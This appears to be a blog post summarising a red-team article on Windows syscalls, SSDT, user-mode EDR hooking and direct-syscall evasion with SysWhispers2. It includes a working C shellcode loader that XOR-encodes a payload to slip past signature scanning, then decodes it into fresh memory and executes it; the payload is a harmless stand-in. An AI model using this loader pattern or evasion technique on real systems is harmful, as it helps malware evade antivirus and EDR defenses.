Cybersecurity · 2 min read

Understanding Windows Kernel and Direct Syscalls for Antivirus and EDR Evasion

Exploring the depths of the Windows kernel, particularly system calls (Syscalls), unveils fascinating insights for cybersecurity enthusiasts, especially those focused on red teaming, offensive security development, and software development. This blog post, inspired by the detailed analysis provided by Yazid on xacone.github.io, delves into the intricacies of Syscalls and their role in bypassing antivirus and Endpoint Detection and Response (EDR) systems.

The Journey of a Syscall in Windows

In Windows, syscalls are the gateway between user-mode applications and the kernel. The documented Win32 API (kernel32.dll) forwards most calls to kernelbase.dll, which in turn calls the undocumented native API in ntdll.dll; each Nt*/Zw* routine there is a small stub that loads the System Service Number into eax and executes the syscall instruction, which is the actual transition from user mode to kernel mode. kernelbase.dll, split out of kernel32.dll in Windows 7, is an internal layering and compatibility step rather than a security boundary: nothing in this chain prevents a process from calling ntdll.dll directly, or from issuing the syscall instruction itself.

The Role of the System Service Dispatch Table (SSDT)

The SSDT is the kernel-side table that maps each System Service Number (SSN) to the kernel routine implementing it: after the transition, the SSN the stub placed in eax is used as an index into this table. The mapping is not stable across Windows versions, and frequently not even across builds of the same version, so code that hard-codes SSNs breaks on the next update. Hooking the SSDT was once a common technique for security products, but on 64-bit Windows Kernel Patch Protection (PatchGuard) bug-checks the machine when the table is modified, so modern EDRs rely instead on user-mode inline hooks in ntdll.dll together with documented kernel callbacks and ETW providers.

Bypassing Antivirus and EDR Systems

Issuing syscalls directly is a way to evade user-mode monitoring. EDR and antivirus products observe API usage by inline hooking (patching the first bytes of ntdll.dll functions with a jump into their own DLL), by Import Address Table (IAT) hooking (redirecting the pointers a module uses to reach imported functions), and historically by SSDT hooking in the kernel. The first two live entirely inside the monitored process's own address space, which is exactly why they can be sidestepped: a process that resolves the SSN itself and executes the syscall instruction never passes through the hooked code.

Implementing Shellcode Loaders

Shellcode loaders are the vehicle for defense evasion. The blog post walks through a simple loader that copies the shellcode into executable memory and then detonates it by jumping to it. To get past static signature scanning by antivirus engines such as Kaspersky, the shellcode is stored XOR-encoded and only decoded in memory at run time; this defeats byte-pattern matching on the file at rest but does nothing against behavioural monitoring once the payload runs.
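The loader shape described above, as an added example that is not code from the original page or from Yazid's post. It XOR-encodes a constructed stand-in payload (a three-byte x64 `xor eax, eax ; ret`, assumed here so the demo is harmless) with a constructed multi-byte key, shows that a naive byte-signature match for the plain bytes no longer fires on the encoded blob, and on Windows decodes the blob into RW memory, flips it to RX and calls it; on other platforms the detonation step is compiled out so the encoding logic can still be built and checked.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Constructed stand-in for a payload: x64 "xor eax, eax ; ret", which just
 * returns 0 when called. A real loader would only embed the encoded form;
 * the plain bytes are kept here so the encoding step can be demonstrated. */
static const uint8_t PLAIN_SHELLCODE[] = { 0x31, 0xC0, 0xC3 };

/* Constructed key. A single-byte key preserves the plaintext's byte
 * frequencies; a multi-byte key at least breaks the repeating pattern. */
static const uint8_t KEY[] = { 0x5A, 0xC3, 0x9F, 0x21, 0x7E };

/* XOR is its own inverse: the same call encodes and decodes in place. */
static void xor_crypt(uint8_t *buf, size_t len, const uint8_t *key, size_t key_len) {
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % key_len];
}

/* Stand-in for a static scanner's byte signature: does `pattern` occur
 * anywhere in `buf`? */
static int contains_pattern(const uint8_t *buf, size_t len,
                            const uint8_t *pattern, size_t plen) {
    if (plen == 0 || plen > len) return 0;
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(buf + i, pattern, plen) == 0) return 1;
    return 0;
}

/* Produce the blob a loader would carry in its binary. Returns its length,
 * or 0 if the output buffer is too small. */
static size_t build_encoded_payload(uint8_t *out, size_t out_len) {
    size_t n = sizeof PLAIN_SHELLCODE;
    if (out_len < n) return 0;
    memcpy(out, PLAIN_SHELLCODE, n);
    xor_crypt(out, n, KEY, sizeof KEY);
    return n;
}

/* Self-check: 1 if the encoded blob no longer matches the plain signature
 * and decoding restores the original bytes exactly. */
static int encoding_roundtrip_ok(void) {
    uint8_t blob[64];
    size_t n = build_encoded_payload(blob, sizeof blob);
    if (n == 0 || contains_pattern(blob, n, PLAIN_SHELLCODE, sizeof PLAIN_SHELLCODE))
        return 0;
    xor_crypt(blob, n, KEY, sizeof KEY);
    return memcmp(blob, PLAIN_SHELLCODE, n) == 0;
}

/* Decode into fresh memory and jump to it. Returns the payload's return value
 * on Windows; elsewhere there is no VirtualAlloc and the step is compiled out. */
static int detonate(const uint8_t *encoded, size_t len) {
#ifdef _WIN32
    /* RW for the decode, then RX for the run: never RWX, which loaders are
     * routinely flagged for. */
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem == NULL) return -1;
    memcpy(mem, encoded, len);
    xor_crypt((uint8_t *)mem, len, KEY, sizeof KEY);
    DWORD old_protect;
    if (!VirtualProtect(mem, len, PAGE_EXECUTE_READ, &old_protect)) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return -1;
    }
    /* Indirect call into non-image memory: this is the call CFG instruments
     * when the loader itself is compiled with /guard:cf. */
    int (*entry)(void) = (int (*)(void))mem;
    int rc = entry();
    VirtualFree(mem, 0, MEM_RELEASE);
    return rc;
#else
    (void)encoded; (void)len;
    return -1;
#endif
}

int main(void) {
    uint8_t blob[64];
    size_t n = build_encoded_payload(blob, sizeof blob);
    printf("plain-byte signature hits encoded blob: %d\n",
           contains_pattern(blob, n, PLAIN_SHELLCODE, sizeof PLAIN_SHELLCODE));
    printf("encode/decode round trip ok: %d\n", encoding_roundtrip_ok());
    printf("detonate returned %d\n", detonate(blob, n));
    return 0;
}
```

The indirect call through `entry` in `detonate` is worth noting: when the loader is itself built with /guard:cf, that is precisely the call Control Flow Guard instruments, which is where the difficulties discussed further down come from.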

Advancing to Direct System Calls

The blog then moves on to mid-level and low-level direct system calls, whose aim is to skip ntdll.dll's stubs and execute the syscall instruction from the loader's own code. The stubs are generated with SysWhispers2, which emits assembly plus a C header and resolves SSNs at run time by sorting ntdll.dll's Zw* exports by address rather than hard-coding build-specific numbers. Along the way the author runs into Windows Control Flow Guard (CFG).

Challenges with Control Flow Guard (CFG)

CFG is a compiler and operating-system mitigation that complicates executing shellcode. For every image built with /guard:cf, Windows records the valid indirect-call targets in a per-process bitmap and the compiler inserts a check before each indirect call; a call to an address that is not marked as a valid target terminates the process with a fast-fail exception instead of executing arbitrary code. The blog details Yazid's encounter with CFG's restrictions, highlighting the complexity of navigating modern Windows security features.

Conclusion

This exploration of Windows Syscalls and their application in bypassing antivirus and EDR systems underscores the complexities and challenges in the field of cybersecurity. It offers valuable insights for those keen on understanding Windows internals and defense evasion techniques.

References

  1. Yazid's original article on xacone.github.io provides a comprehensive exploration of Windows syscalls and their role in cybersecurity.
  2. Further reading on syscalls and their application can be found on resources such as Red Ops, Red Team Notes, and CodeProject, which offer in-depth analyses and practical insights into Windows internals and security mechanisms.
